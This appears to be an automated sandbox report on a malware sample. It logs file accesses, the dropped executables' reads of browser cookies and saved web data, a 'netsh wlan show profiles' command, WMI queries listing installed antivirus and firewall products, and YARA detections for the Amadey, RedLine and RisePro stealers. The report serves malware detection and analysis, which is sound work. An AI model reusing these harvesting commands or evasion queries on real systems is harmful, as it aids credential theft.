                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B9E27A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00B9E27A
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Uses netsh to modify the Windows network and firewall settings
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected Amadeys Clipper DLL
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, type: DROPPED
                              Yara detected Amadeys stealer DLL
                              Source: Yara matchFile source: 15.2.chrosha.exe.70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.amert.exe.360000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe.b80000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.2.explorha.exe.700000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.explorha.exe.700000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000003.2052123987.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000003.2792595641.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.2089957305.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000032.00000003.3292101674.0000000004840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000003.2687465416.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000003.2831581300.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.2110741282.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2880613801.0000000000071000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
                              Yara detected RedLine Stealer
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
                              Yara detected RisePro Stealer
                              Source: Yara matchFile source: 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000033.00000002.3372562116.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000003.3072924932.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000033.00000003.3293720784.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000003.2990613852.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
